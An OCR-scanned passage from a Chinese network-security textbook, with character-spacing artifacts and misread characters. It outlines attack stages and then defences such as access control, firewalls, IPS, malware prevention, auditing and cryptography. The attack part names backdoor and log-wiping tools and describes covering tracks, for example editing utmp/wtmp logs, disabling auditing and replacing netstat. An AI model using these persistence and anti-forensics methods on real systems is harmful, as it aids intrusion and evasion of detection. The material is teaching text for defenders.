性 进行 检测 ,发现 可 利用 的 漏洞 的 一 种 安全 检测 (渗透 攻击 ) 行 为 。 在 检测 出 目标 系统 和 
服务 的 类 型 及 版 本 后 ,需要 进一步 扫描 它们 是 否 存在 可 供 利用 的 安全 漏洞 ,这 一 步 的 工作 
通常 由 专用 的 漏洞 扫描 工具 完成 ,如 经 典 漏洞 扫描 工具 Nessus, 其 开源 版 本 Openvas 及 
国产 对 应 版 本 X-scan 等 。 除 了 对 主机 系统 的 漏洞 扫描 工具 外 ,还 有 专门 针对 Web 应 用 
程序 的 漏洞 扫描 工具 ,如 Nikto、Golismero 等 ,专门 针对 数据 库 DBMS 的 漏洞 扫描 工具 ， 
如 NGS SQuirrel。 

4. 攻击 实施 

当 攻击 者 检测 到 可 利用 漏洞 后 ,利用 漏洞 破解 程序 即 可 发 起 人 侵 或 破坏 性 攻击 。 攻 
击 的 结果 一 般 分 为 拒绝 服务 攻击 ,获取 访问 权限 和 提升 访问 权限 等 。 拒 绝 服务 攻击 可 以 
使 得 目标 系统 瘫痪, 此 类 攻击 危害 极 大 ,特别 是 从 多 台 不 同 主机 发 起 的 分 布 式 拒绝 服务 攻 
击 (DDoS), 目 前 还 没有 防御 DDoS 的 较 好 解决 办 法 。 获 取 访 问 权 限 指 获得 目标 系统 的 一 
个 普通 用 户 权限 ,一 般 利 用 远程 漏洞 进行 远程 人 侵 都 是 先 获 得 普通 用 户 权限 ,然后 需要 配 
合 本 地 漏洞 把 获得 的 权限 提升 为 系统 管理 员 的 最 高 权限 。 只 有 获得 了 最 高 权限 后 , 才 可 
以 实施 如 网 络 监 听 、 清 除 攻击 痕迹 等 操作 。 权 限 提升 的 其 他 办 法 包括 暴力 破解 管理 员 口 
令 、 检 测 系统 配置 错误 、 网 络 监听 或 设置 钓鱼 木马 。 

早期 的 攻击 工具 往往 是 针对 某 个 具体 漏洞 单独 开发 ,如 针对 Windows RPC 漏洞 
MS03-026 的 攻击 工具 scanms. exe, 其 自动 寻找 网 络 中 的 漏洞 主机 并 可 批量 发 起 攻击 。 
目前 ,网 络 攻击 正在 向 平台 化 和 集成 化 发 展 ,攻击 者 可 以 根据 研究 者 公开 的 漏洞 直接 在 平 
台 上 利用 已 有 模块 快速 开发 和 部 署 漏洞 破解 程序 ,并 集成 其 他 的 工具 实施 完整 的 攻击 ,此 
类 平台 最 著名 的 代表 是 Rapid7 公司 出 品 的 Metasploit 工具 包 , 不 仅 包 含 大 量 最 新 的 漏 
洞 , 还 几乎 集成 了 所 有 网 络 攻击 所 需要 的 软件 工具 ,同时 提供 了 诸多 开发 模块 ,方便 攻击 
者 开发 新 的 破解 程序 。 
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5. 设置 后 门 

一 次 成 功 的 攻击 往往 耗费 大 量 时 间 和 精力 ,因此 攻击 者 为 了 再 次 进入 目标 系统 并 保 
持 访问 权限 ,通常 在 退出 攻击 之 前 ,会 在 系统 中 设置 后 门 程序 。 木 马 和 Rootkits 也 可 以 
说 是 后 门 。 所 谓 后 门 ,就 是 无 论 系统 配置 如 何 改变 ,都 能 够 成 功 让 攻击 者 再 次 轻松 和 隐蔽 
地 进入 网 络 或 系统 而 不 被 发 现 的 通道 。 

设置 后 门 的 主要 方法 有 开放 不 安全 的 服务 端口 、 修 改 系统 配置 .安装 网 络 嗅 探 器 、 建 
立 隐 藏 通道 .创建 具有 root 权限 的 虚假 用 户 账号 .安装 批 处 理 文件 .安装 远程 控制 木马 、 
使 用 木马 程序 蔡 换 系统 程序 等 。 

经 典 的 后 门 设置 工具 有 专门 生成 木马 程序 以 替换 系统 程序 的 工具 backdoor-factory、 
基于 Python 的 多 模块 后 门 集成 工具 intersect、 基 于 Powershell 的 后 门 集成 工具 
nishang 等 。 

6. 清除 痕迹 

在 攻击 成 功 获 得 访问 权 或 控制 权 后 ,此 时 最 重要 的 事情 是 清除 所 有 痕迹 ,隐藏 自己 踪 
迹 ,防止 被 管理 员 发 现 。 因 为 所 有 操作 系统 通常 都 提供 日 志 记录 ,会 把 所 有 发 生 的 操作 记 
录 下 来 ,所 以 攻击 者 往往 要 清除 登录 日 志和 其 他 有 关 记 录 。 常 用 方法 包括 隐藏 上 传 的 文 
件 、 修 改 日 志文 件 中 的 审计 信息 、 修 改 系统 时 间 造 成 日 志文 件数 据 紊 乱 、 删 除 或 停止 审计 
服务 进程 干扰 入 侵 检测 系统 正常 运行 ,修改 完整 性 检测 数据 、 使 用 Rootkits 工具 等 。 

清除 痕迹 的 办 法 因 操 作 系 统 的 不 同 而 不 同 。Windows 的 系统 日 志保 存在 *% 
systemroot%\system32\config” 目 录 下 ,使 用 事件 查看 器 观察 和 修改 ,攻击 者 可 使 用 日 志 
清除 工具 clearlog 来 清除 痕迹 。 可 以 修改 Windows 系统 的 本 地 安全 策略 ,将 有 关 的 安全 
审计 策略 关闭 。Linux 下 常用 日 志清 除 工具 有 zap、wzap 和 wted 等 ,用 于 清除 utmp、 
wtmp \lastlog 等 日 志文 件 中 某 一 用 户 的 信息 。 还 可 以 通过 替换 系统 程序 的 办 法 来 隐藏 
痕迹 ,例如 替换 netstat 程序 来 隐藏 特定 网 络 连 接 。 

当前 ,网 络 攻击 手段 越 来 越 高 明 , 网 络 攻击 技术 正 朝 着 自动 化 ,智能 化 、 系 统 化 、 高 速 
化 等 方向 发 展 ,网 络 攻 击 已 经 对 网 络 安全 构成 了 极 大 的 威胁 。 我 们 必须 熟知 各 种 网 络 攻 
击 的 基本 原理 和 技术 , 才 可 以 做 好 相应 的 防护 。 若 不 了 解 网 络 攻击 的 基本 原理 ,研究 网 络 
安全 就 等 于 纸上谈兵 。 


1.3.3 网 络 防御 技术 


网 络 防御 主要 是 用 于 防范 网 络 攻击 ,为 了 应 对 不 断 更 新 的 网 络 攻击 手段 ,防御 技术 也 
在 从 被 动 防御 向 主动 防御 发 展 。 现 有 防御 技术 大 体 可 以 分 为 加 密 技术 、 访 问 控制 技术 、 安 
全 检测 技术 、 安 全 监控 技术 和 安全 审计 技术 等 ,综合 运用 这 些 技 术 , 根 据 目 标 网 络 的 安全 
需求 ,有 效 形成 网 络 安全 防护 的 解决 方案 ,可 以 很 好 地 抵御 网 络 攻击 。 

常见 的 网 络 防御 技术 有 信息 加 密 、 访 问 控制 ,防火墙 ,入侵 防御 、 恶 意 代码 防范 ,安全 
审计 与 查证 等 。 

1. 信息 加 密 

加 密 是 网 络 安全 的 核心 技术 ,是 传输 安全 的 基础 ,包括 数据 加 密 、 消 息 摘要 、 数 字 签 名 
和 密 钥 交换 等 ,可 以 实现 保密 性 、 完 整 性 和 不 可 和 否认 人 性 等 基本 安全 目标 ( 见 1.3.4 节 )。 
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2. 访问 控制 


访问 控制 是 网 络 防 护 的 核心 策略 。 它 基于 身份 认证 ,规定 了 用 户 和 进程 对 系统 和 资 
源 访问 的 限制 ,目的 是 保证 网 络 资源 受 控 且 合 法 地 使 用 ,用 户 只 能 根据 自身 权限 访问 系统 
资源 ,不 能 越权 访问 。 

身份 认证 是 指 用 户 要 向 系统 证 明 他 就 是 他 所 声称 的 用 户 ,包括 身份 识别 和 身份 验证 。 
身份 识别 是 明确 访问 者 的 身份 ,识别 信息 是 公开 的 ,例如 居民 身份 证 件 上 的 姓名 和 住址 等 
信息 。 身 份 验 证 是 对 其 身份 进行 确认 ,验证 信息 是 保密 的 ,例如 查验 居民 身份 证 上 的 信息 
是 否 真实 有 效 。 身 份 认 证 就 是 证 实用 户 的 真实 身份 是 否 与 其 申明 的 身份 相符 的 过 程 ,是 
为 了 限制 非法 用 户 访问 网 络 资源 ,是 所 有 其 他 安全 机 制 的 基础 。 

身份 认证 包括 单机 环境 下 的 认证 和 网 络 环境 下 的 认证 。 单 机 认证 一 般 包括 : 

(1) 基于 口令 的 认证 : 最 常用 的 身份 认证 技术 。 用 户 输入 口令 ,主机 进行 验证 并 给 
予 用 户 相应 权限 。 其 主要 考虑 如 何 存 储 口 令 , 常 见方 法 有 明文 存储 、 散 列 存储 和 加 盐 散 列 
存储 。UNIX 下 通常 采用 加 盐 散 列 ,而 Windows 则 没有 ,所 以 Windows 口令 相对 容易 破 
解 。 现 在 , 随 着 全 自动 暴力 破解 工具 的 出 现 ,基于 口令 的 认证 方式 已 经 变 得 越 来 越 不 
可 靠 。 

(2) 基于 智能 卡 的 认证 : 双 因 素 认 证 方法 ,也 称 为 增强 认证 ,要 求 用 户 拥有 两 种 完全 
不 同 因素 。 每 个 用 户 持 有 智能 卡 ,智能 卡 存储 用 户 的 秘密 信息 ,认证 服务 器 中 同样 存 有 该 
秘密 信息 ,进行 认证 时 ,用 户 输入 个 人 身份 识别 码 (PIN 码 ) ,智能卡 识别 PIN 是 否 正确 ， 
如 果 正 确 , 服 务 器 读 出 智能 卡 中 的 秘密 信息 与 智能 卡 中 的 信息 进行 比较 来 实现 认证 。 如 
果 PIN 或 者 智能 卡 被 穷 取 ,用 户 依然 不 会 被 假冒 。 

(3) 基于 生物 特征 的 认证 : 此 类 认证 以 人 体 唯一 可 靠 且 稳定 的 生物 特征 (如 指纹 、 脸 
型 . 掌 纹 . 虹 膜 ) 等 为 依据 ,利用 服务 器 的 强大 计算 能 力 进 行 图 像 处 理 和 模式 识别 。 其 首先 
捕捉 人 的 生物 特征 ,转化 为 数字 符号 ,然后 存 成 此 人 的 特征 模板 ,在 此 人 登录 时 ,再 次 捕捉 
此 人 生物 特征 与 已 有 模板 进行 比较 来 确认 。 该 技术 有 很 好 的 安全 性 .可 靠 性 和 有 效 性 , 目 
前 主要 问题 是 网 络 环境 下 ,认证 速度 相对 较 慢 。 

网 络 环境 下 的 身份 认证 必须 防止 通过 网 络 传输 的 身份 信息 被 攻击 者 窃取 和 重 放 , 包 
括 多 种 身份 认证 协议 ,如 挑战 握手 认证 、Kerberos 认证 协议 .TLS 认证 协议 等 。 

身份 认证 解决 用 户 是 谁 ,而 访问 控制 决定 用 户 能 够 做 什么 ,访问 控制 的 基础 是 授权 ， 
它 的 目标 是 防止 对 任何 资源 的 非 授 权 访 问 。 所 谓 非 授权 访问 包括 未 经 授权 的 使 用 、 汽 露 、 
修改 、 销 毁 以 及 命令 执行 等 。 访 问 控制 系统 一 般 包括 : 

(1) 主体 : 发 出 访问 操作 和 存 取 要 求 的 主动 方 , 通 常 指 用 户 或 某 个 用 户 进程 。 

(2) 客体 : 主体 试图 访问 的 一 些 资源 。 

(3) 安全 访问 策略 : 一 套 规则 ,用 于 确定 一 个 主体 是 否 对 客体 拥有 访问 能 力 。 

访问 控制 功能 组 件 包括 四 部 分 ,如 图 1-4 所 示 , 即 访问 发 起 者 执行 组 件 、 决 策 组 件 和 
访问 目标 。 

访问 发 起 者 指 信息 系统 的 资源 请 求 者 ,是 主体 ; 目标 是 发 起 者 试图 访问 的 基于 主机 
的 实体 ,是 客体 ; 执行 组 件 的 功能 负责 建立 主体 和 客体 间 的 通信 桥梁 ,当主 体 提出 执行 操 
作 请 求 时 ,执行 组 件 将 请 求 转发 给 决策 组 件 ,由 决策 组 件 判定 是 否 允 许 ; 决策 组 件 是 访问 
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控制 系统 的 核心 , 它 依据 一 套 安全 访问 策略 进行 决策 。 


访问 发 起 者 提交 请 求 re 执行 请 求 | 


决策 请 求 决策 结果 
决策 组 件 


图 1-4 访问 控制 系统 示意 图 


网 络 需 要 保护 的 资源 很 多 ,可 能 是 硬件 (如 CPU、 内 存 或 者 打印 机 等 ), 也 可 能 是 软件 
(如 进程 ,文件 和 数据 库 记 录 等 ), 可 以 将 这 些 资源 看 成 一 个 个 待 保护 的 对 象 。 根 据 访问 控 
制 的 对 象 粒度 ,可 以 分 为 粗 粒 度 、 中 粒度 和 细 粒 度 访问 控制 ,一 般 认为 能 够 控制 到 文件 的 
访问 可 称 为 细 粒 度 的 访问 控制 。 

常见 访问 控制 技术 主要 包括 : 

(1) 自主 访问 控制 (Discretionary Access Control, DAC): 基于 拥有 者 的 访问 控制 ， 
即 某 资源 的 拥有 者 可 以 将 该 资源 的 访问 权限 随意 赋予 其 他 主体 ,一 般 采 用 访问 控制 矩阵 
实现 ,一 行 表 示 一 个 主体 ,一列 表示 一 个 受 保护 的 客体 。 具 体 实 现 访问 控制 矩阵 的 方法 分 
为 基于 行 的 访问 能 力 表 和 基于 列 的 访问 控制 表 两 种 。DAC 在 一 定 程 度 上 实现 了 权限 隔 
离 和 资源 保护 ,但 是 其 资源 管理 较为 分 散 , 没 有 统一 的 全 局 控制 。 

(2) 强制 访问 控制 (Mandatory Access Control,MAC) : 系统 强制 主体 服从 访问 控制 
政策 。 管 理 员 根据 主体 和 客体 各 自 的 安全 属性 之 间 的 关系 ,决定 主体 对 客体 能 和 否 执行 特 
定 操作 ,不 允许 主体 直接 或 间接 修改 自身 或 任何 客体 的 安全 属性 ,也 不 能 将 自己 拥有 的 访 
问 权限 授予 其 他 主体 。 强 制 访问 控制 特别 适合 于 多 层次 安全 级 的 系统 ,其 主要 缺陷 在 于 
不 够 灵活 ,实现 工作 量 较 大 。 

(3) 基于 角色 的 访问 控制 (Role-Based Access Control,RBAC): 核心 思想 是 将 访问 
权限 与 角色 相 联 系 ,包括 三 个 实体 , 即 用 户 、 角 色 和 权限 。 角 色 是 根据 不 同 任务 需要 而 设 
置 的 ,用 户 可 以 在 角色 间 进 行 转换 ,系统 可 以 添加 或 删除 角色 ,也 可 以 对 角色 的 权限 进行 
添加 或 删除 。 用 户 即 对 数据 对 象 操作 的 主体 ,可 以 是 人 或 主机 。 权 限 即 对 某 客 体 进行 特 
定 模式 访问 的 操作 权利 。RBAC 具有 以 下 特点 : 

QO@ 以 角色 作为 访问 控制 的 主体 ; 

@ 每 个 角色 可 以 继承 其 他 角色 权限 ; 

@ 最 小 权限 原则 , 即 用 户 权 限 不 超过 其 执行 工作 所 需 权 限 。 

RBAC 与 DAC 的 区 别 在 于 ,用 户 与 客体 之 间 无 直接 联系 ,只 有 通过 角色 才能 访问 客 
体 ,因此 用 户 无 法 自主 将 访问 权限 赋予 其 他 主体 ; 与 MAC 的 区 别 在 于 ,RBAC 不 是 基于 
多 级 安全 需求 的 ,MAC 主要 考虑 信息 的 保密 性 ,而 RBAC 主要 考虑 信息 的 完整 性 。 

3. 防火 墙 

所 谓 防 火 墙 是 指 在 不 同 网 络 或 网 络 安全 域 之 间 , 对 网 络 流量 或 访问 行为 实施 访问 控 
制 的 一 系列 安全 组 件 或 设备 ,从 技术 上 分 类 . 它 属于 网 络 访问 控制 机 制 。 它 通常 工作 在 可 
信和 内 部 网 络 和 不 可 信 外 部 网 络 之 间 的 边界 ,如 图 1-5 所 示 , 其 所 遵循 的 原则 是 在 保证 网 络 畅 
通 的 前 提 下 , 尽 可 能 保证 内 部 网 络 的 安全 。 它 是 一 种 被 动 的 技术 ,也 是 一 种 静态 安全 组 件 。 
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1-5 防火墙 示意 图 


防火 墙 应 满足 的 基本 条 件 如 下 : 

(1) 内 网 和 外 网 之 间 的 所 有 数据 流 必 须 经 过 防火 墙 。 

(2) 只 有 符合 安全 策略 的 数据 流 才 能 通过 防火 墙 。 

(3) 自身 具有 高 可 靠 性 , 即 防火 墙 本 身 不 能 被 入侵 。 

根据 安全 策略 ,防火 墙 对 数据 流 的 处 理 方式 有 三 种 , 即 允 许 、 丢 弃 和 拒绝 。 

防火 墙 的 功能 主要 包括 以 下 几 个 方面 : 

(1) 服务 控制 : 只 允许 子 网 间 相互 交 换 与 特定 服务 有 关 的 信息 。 

(2) 方向 控制 : 只 允许 由 某 个 特定 子 网 的 终端 发 起 的 与 特定 服务 相关 的 信息 通过 。 

(3) 用 户 控制 : 为 每 个 用 户 设 定 访问 权限 ,对 访问 资源 的 用 户 进行 认证 ,实现 用 户 的 
访问 控制 。 

(4) 行为 控制 : 对 访问 资源 的 操作 行为 进行 控制 和 记录 ,可 记录 各 种 非法 活动 ,过 滤 
非法 内 容 等 。 

防火 墙 也 存在 不 少 缺 陷 , 主 要 包括 : 

(1) 不 能 防范 不 经 过 防火 墙 的 攻击 。 

(2) 不 能 防范 来 自 内 网 的 攻击 。 

(3) 不 能 防范 病毒 后门, 木马 和 数据 驱动 攻击 。 

(4) 只 能 防范 已 知 威胁 ,难以 防御 新 的 威胁 。 

防火 墙 的 类 型 主要 有 个 人 防火 墙 和 网 络 防火 墙 两 类 。 个 人 防火 墙 有 时 与 操作 系统 的 
安全 规则 相 结合 。 网 络 防 火 墙 按照 工作 的 网 络 层次 划分 ,包括 包 过 滤 防 火 墙 , 电 路 层 网 关 
和 应 用 层 网 关 三 类 ,其 中 包 过 滤 防 火 墙 又 分 为 有 状态 和 无 状态 两 类 。 按 照 实现 方式 划分 
又 可 分 为 硬件 防火 墙 和 软件 防火 墙 , 硬 件 防 火 墙 主要 是 基于 专用 硬件 设备 实现 高 速 过 滤 ， 
如 Cisco 的 PIX; 软件 防火 墙 依赖 于 底层 操作 系统 支持 ,需要 在 主机 上 安装 运行 配置 后 才 
能 使 用 ,如 Windows 自 带 的 个 人 防火 墙 \Linux 下 的 iptables。 

防火 墙 既 要 限制 数据 的 流通 又 要 保持 数据 的 流通 ,因此 根据 网 络 安全 的 总 体 需求 , 实 
现时 通常 遵循 以 下 两 项 基本 原则 : 

(1) 一 切 未 被 允许 的 都 是 禁止 的 。 即 默认 防火 墙 限制 所 有 数据 流 , 然 后 对 希望 提供 
的 服务 逐 项 开放 。 这 种 方法 很 安全 ,但 是 限制 了 用 户 使 用 的 便利 性 。 

(2) 一 切 未 被 禁止 的 都 是 允许 的 。 即 默认 防火 墙 转发 所 有 数据 流 ,然后 逐 项 屏蔽 可 
能 有 危险 的 服务 。 这 种 方法 很 灵活 ,但 是 安全 性 较 难 保证 ,因为 管理 员 可 能 会 忘记 屏蔽 某 
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项 危险 服务 。 

防火 墙 仅仅 是 网 络 防护 的 第 一 道 闸门 , 它 必 须 与 其 他 安全 技术 结合 起 来 使 用 ,才能 有 
效 地 保护 网 络 的 安全 。 

4. 入 侵 防御 

和 人 侵 是 指 未 经 授权 蓄意 访问 、 自 改 数据 ,使 网 络 系统 不 可 使 用 的 行为 。 入 侵 防御 系统 
(Intrusion Prevention System,IPS) 是 指 通过 对 行为 、 安 全 日 志 、 审 计数 据 或 其 他 网 络 上 
可 以 获得 的 信息 进行 操作 ,检测 到 对 系统 的 入侵 或 入 侵 企图 ,并 及 时 采取 行动 阻止 人 侵 。 
IPS 是 一 种 主动 安全 技术 ,不仅 可 以 检测 来 自 外 部 的 入侵 行为 ,同时 可 以 检测 来 自 网 络 内 
部 用 户 的 未 授权 活动 和 误 操作 ,可 有 效 弥 补 防火 墙 的 不 足 , 被 称 为 防火 墙 之 后 的 第 二 道 闸 
门 。 它 通常 与 防火 墙 联合 ,把 攻击 拦截 在 防火 墙 外 。 与 防火 墙 的 不 同 之 处 在 于 ,入 侵 防 御 
主要 检测 内 部 网 络 流 的 信息 流 模式 ,尤其 是 关键 网 段 的 信息 流 模 式 , 及 时 报警 并 通知 管理 
员 。 它 的 主要 功能 包括 : 

(1) 识别 常用 入 侵 和 攻击 手段 。 

(2) 监控 并 记录 网 络 异常 通信 。 

(3) 鉴别 对 系统 漏洞 或 后 门 的 利用 。 

(4) 实时 对 检测 到 的 入 侵 进行 报警 。 

(5) 及 时 提供 响应 机 制 ,阻止 人 侵 继 续 进 行 。 

IETF 将 一 个 IPS 分 成 四 个 组 件 : 事件 生成 器 、 事 件 分 析 器 、 响 应 单元 、 事 件数 据 库 ， 
如 图 1-6 所 示 。 事 件 是 IPS 所 分 析 的 数据 的 统称 , 它 可 以 是 系统 或 应 用 程序 日 志 , 也 可 以 
是 网 络 报 文 。 事 件 生成 器 从 设备 或 主机 节点 收集 事件 ,并 向 其 他 部 件 提供 。 事 件 分 析 器 
分 析 得 到 数据 ,并 产生 分 析 结果 。 响 应 单元 是 对 分 析 结 果 做 出 反应 的 功能 组 件 , 可 以 切断 
连接 .阻隔 IP、 报 警 等 。 事件 数据 库 是 存放 各 种 中 间 数 据 和 最 终 数 据 的 地 方 的 统称 , 它 可 
以 是 复杂 的 数据 库 , 也 可 以 是 简单 文本 文件 。 
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图 1-6 ”IPS 的 基本 组 成 
按照 检测 对 象 划分 ,IPS 可 分 为 基于 主机 、 基 于 网 络 或 混合 型 IPS。 按 照 分 析 技 术 划 





分 ,可 分 为 误 用 检测 和 异常 检测 ,著名 的 轻 量 级 IPS 一 一 Snort 就 是 基于 误 用 检测 技术 实 
现 的 。 按 照 部 署 方 式 划分 ,可 分 为 集中 式 、 分 布 式 和 分 层 式 三 类 。 按 照 系统 工作 方式 划 
分 ,可 分 为 离线 分 析 和 在 线 分 析 。 按 照 响应 方式 划分 ,可 分 为 被 动 响应 和 主动 响应 。 

IPS 关键 技术 之 一 是 分 析 技 术 ., 它 关系 到 对 入 侵 的 检测 效果 、 效 率 和 误 报 率 等 ,但 是 
目前 IPS 与 防火 墙 产 品 相 比 ,还 存在 不 少 问 题 : 

(1) 攻击 技术 不 断 更 新 ,检测 手段 容易 被 绕 过 ,IPS 很 难 及 时 跟踪 最 新 的 攻击 技术 。 
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(2) IPS 通常 假设 攻击 信息 是 明文 传输 的 ,加 密 的 恶意 信息 可 以 较 轻松 地 逃避 检测 。 

(3) 网 络 设备 多 样 化 ,IPS 需要 协调 和 适应 多 样 性 的 环境 。 

(4) 用 户 需要 IPS 实时 报警 ,因此 需要 对 大 规模 数据 实时 分 析 。 

(5) 各 厂家 各 自 为 战 ,缺乏 统一 的 标准 ,使 得 产品 间 互 通 很 困难 。 

(6) 大 量 的 误 报 和 漏 报 使 得 发 现 真正 的 入侵 非常 困难 。 

5. 恶意 代码 防范 

所 谓 恶意 代码 实质 是 一 种 在 一 定 环境 下 可 以 独立 执行 的 指令 集 或 襄 入 到 其 他 程序 中 
的 代码 。 恶 意 代 码 分 类 的 标准 是 独立 性 和 自我 复制 性 。 独 立 性 是 指 恶 意 代 码 本 身 可 独立 
执行 , 非 独 立 性 ( 即 依附 性 ) 指 必须 要 嵌入 到 其 他 程序 中 执行 的 恶意 代码 ,本 身 无 法 独立 执 
行 。 自 我 复制 性 指 能 够 自动 将 自己 传染 给 其 他 正常 程序 或 传播 给 其 他 系统 ,不 具有 自我 
复制 能 力 的 恶意 代码 必须 借助 其 他 媒介 传播 。 因 此 恶意 代码 可 分 为 四 大 类 : 

(1) 不 具有 复制 能 力 的 依附 性 恶意 代码 ,包括 木马 .逻辑 炸弹 、 后 门 。 

(2) 不 具有 复制 能 力 的 独立 性 恶意 代码 ,包括 木马 生成 器 .恶作剧 .木马 后门、 
Rootkits 。 

(3) 具有 自我 复制 能 力 的 依附 性 恶意 代码 ,包括 病毒 。 

(4) 具有 自我 复制 能 力 的 独立 性 恶意 代码 ,包括 蠕虫 .恶意 脚本 僵尸 .计算 机 细菌 。 

恶意 代码 的 传播 途径 包括 移动 媒介 、Web 站 点 .电子 邮件 和 自动 传播 等 。 所 有 编程 
语言 都 可 编写 恶意 代码 ,常见 的 恶意 脚本 使 用 VBS 或 JavaScript 实现 ,木马 和 病毒 多 用 
C 和 C++ 实现。 

恶意 代码 行为 表现 各 异 ,破坏 程度 千差万别 ,但 是 基本 机 制 大 体 相同 ,可 分 为 如 下 几 
个 步骤 : 

Q@ 入 侵 系统 。 入 侵 系 统 是 恶意 代码 实现 目的 的 必要 条 件 。 入 侵 途 径 可 以 是 远程 攻 
击 、 网 页 木马 、 邮 件 病毒 、 网 络 钓鱼 等 。 

@ 维持 或 提升 权限 。 恶 意 代码 的 传播 与 破坏 必须 使 用 用 户 或 进程 的 合法 权限 才能 
完成 。 
@ 隐身 。 可 以 通过 改名 、 删 除 文件 或 修改 系统 安全 策略 来 隐藏 自己 。 

@ 潜伏 。 平 时 不 运行 ,等 待 条 件 成 熟 时 发 作 并 进行 破坏 。 

@ 破坏 。 恶 意 代码 本 质 具有 破坏 性 ,目的 是 造成 信息 丢失 泄密、 破坏 系统 完整 性 等 。 
重复 上 述 过 程 , 对 新 的 目标 实施 攻击 。 

其 攻击 机 制 如 图 1-7 所 示 。 
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图 1-7 恶意 代码 攻击 机 制 
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针对 不 同类 别 的 恶意 代码 ,防范 方法 各 有 不 同 ,但 是 使 用 的 防范 技术 类 似 ,主要 包括 : 

(1) 基于 特征 的 扫描 技术 : 反 病 毒 引 擎 最 常用 的 技术 。 首 先 建立 恶意 代码 的 特征 文 
件 , 在 扫描 时 根据 特征 进行 匹配 查找 。 

(2) 校 验 和 法 : 在 系统 未 被 感染 前 ,对 待 检测 的 正常 文件 生成 其 校 验 和 值 , 然 后 周期 
性 地 检测 文件 的 改变 情况 。 

(3) 沙 箱 技术 : 根据 可 执行 程序 需要 的 资源 和 拥有 的 权限 建立 程序 的 运行 沙 箱 。 每 
个 程序 都 运行 在 自己 的 沙 箱 中 ,无 法 影响 其 他 程序 的 运行 ,在 沙 箱 中 可 以 安全 检测 和 分 析 
恶意 代码 的 行为 。 

(4) 基于 蜜 久 的 检测 技术 : 蜜 饶 是 虚拟 系统 ,伪装 成 有 许多 服务 的 服务 器 主机 以 吸 
引 黑客 攻击 ,同时 安装 强大 的 监测 系统 ,用 于 监测 恶意 代码 的 攻击 过 程 。 

6. 安全 审计 与 查证 

网 络 安全 审计 是 指 在 特定 网 络 环境 下 ,为 了 保证 网 络 系统 和 信息 资源 不 受 来 自 外 网 
和 内 网 用 户 的 入 侵 和 破坏 ,运用 各 种 技术 手段 实时 收集 和 监控 网 络 各 组 件 的 安全 状态 和 
安全 事件 ,以 便 集中 报警 .分 析 和 处 理 的 一 种 技术 。 它 作为 一 种 新 的 概念 和 发 展 方向 ,已 
经 出 现 许多 产品 和 解决 方案 ,如 上 网 行为 监控 、 信 息 过滤 等 。 

安全 审计 对 于 系统 安全 的 评价 ,对 攻击 源 和 攻击 类 型 与 危害 的 分 析 、 对 完整 证 据 的 收 
集 至 关 重 要 ,其 主要 作用 包括 : 

(1) 对 潜在 攻击 者 起 到 震慑 或 警告 作用 。 

(2) 对 已 发 生 的 系统 破坏 行为 提供 有 效 证 据 。 

(3) 提供 有 价值 的 日 志 ,帮助 管理 员 发 现 系统 入 侵 行为 或 潜在 系统 漏洞 。 

(4) 提供 系统 运行 的 统计 日 志 ,发 现 系统 性 能 的 脆弱 点 。 

安全 审计 的 内 容 多 种 多 样 , 若 按 审计 对 象 划分 ,可 分 为 操作 系统 审计 、 应 用 程序 审计 、 
网 络 设备 审计 和 安全 应 用 审计 等 。 网 络 安全 审计 主要 包括 网 络 设备 及 关键 数据 .日 志文 
件 和 安全 威胁 审计 等 内 容 。 

(1) 网 络 设备 审计 : 路 由 器 、 交 换 机、 防火 墙 \, 和 人 侵 检 测 设备 .主机 、 服 务 器 等 ,主要 审 
计 配 置信 息 、 用 户 权 限 、 链 路 带宽 等 。 

(2) 日 志文 件 审计 : 日 志 记录 了 系统 运行 情况 ,通过 它 可 以 检查 发 生 错 误 的 原因 ,或 
发 现 攻击 痕迹 。 

(3) 安全 威胁 审计 : 未 经 授权 的 资源 访问 .未 经 授权 的 数据 修改 和 操作 、 拒 绝 服 
务 等 。 


1.3.4 密码 技术 应 用 


网 络 安全 的 核心 建立 在 密码 学 理论 和 技术 基础 之 上 。 密 码 技术 包括 密码 算法 设计 、 
密码 分 析 、 安 全 协议 .身份 认证 数字 签名 和 密 钥 管理 等 。 网 络 安全 的 机 密 性 、 完 整 性 、 可 
用 性 、 可 控 性 ,都 可 以 利用 密码 技术 得 到 满意 解决 。 密 码 技术 在 网 络 中 的 应 用 重点 是 密码 
学 在 保密 性 方面 的 应 用 ,涉及 对 称 密码 体制 和 公 钥 密码 体制 ,加 /解密 技术 与 身份 认证 、 完 
整 性 和 不 可 否认 性 密切 相关 ,因而 认证 技术 和 公 钥 基础 设施 (Public Key Infrastructure， 
PKD) 也 是 重要 的 内 容 。 
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1. 密码 学 与 密码 体制 


密码 学 是 网 络 信息 安全 的 基础 ,包括 编码 学 和 分 析 学 两 部 分 。 密 码 编码 学 研究 如 何 
构造 一 个 符合 安全 要 求 的 密码 系统 ,密码 分 析 学 试图 破译 加 密 算法 和 密 钥 ,两 者 相互 对 立 
又 相互 促进 。 密 码 学 的 发 展 历史 分 为 三 个 阶段 : 

(1) 古典 密码 学 : 1949 年 之 前 。 密 码 学 不 是 科学 而 是 一 门 艺 术 , 编 码 和 分 析 手 段 比 
较 原 始 , 数 据 安全 基于 算法 保密 。 

(2) 对 称 密码 学 : 1949 一 1975 年 。 香 农 (Shannon) 发 表 (保密 系统 的 信息 理论 》, 从 此 
密码 学 成 为 一 门 独立 科学 ,数据 安全 基于 密 钥 而 不 是 算法 的 保密 。 

(3) 公 钥 密码 学 : 1976 年 至 今 。Diffie 和 Hellman 发 表 ( 密 码 学 的 新 方向 》, 证 明 发 
送 端 和 接收 端 不 需要 传输 密 钥 即 可 实现 保密 通信 。 

在 密码 系统 中 , 待 加 密 的 消息 称 作 明 文 (PlainText) ,密码 可 将 明文 变换 为 密 文 
(CipherText) ,这 种 由 明文 变 为 密 文 的 过 程 称 为 加 密 (Encryption)。 从 密 文 恢 复出 明文 
的 过 程 称 为 解密 (Decryption) ,试图 从 密 文 分 析出 明文 的 过 程 称 为 破译 。 对 明文 进行 加 
密 时 所 采用 的 规则 称 为 加 密 算法 ,对 密 文 进行 解密 时 采用 的 规则 称 为 解密 算法 。 加 密 算 
法 和 解密 算法 是 在 一 组 只 有 合法 用 户 知道 的 密 钥 的 控制 下 进行 的 。 加 密 和 解密 过 程 中 使 
用 的 密 钥 分 别称 为 加 密 密 钥 和 解密 密 钥 。 

一 个 保密 通信 系统 通常 定义 为 一 对 数据 变换 ,一 个 对 应 加 密 ,一 个 对 应 解密 ,由 六 元 
组 (M,C,Ki,K; ,En ,De) 组 成 ,如 图 1-8 所 示 , 其 中 : 

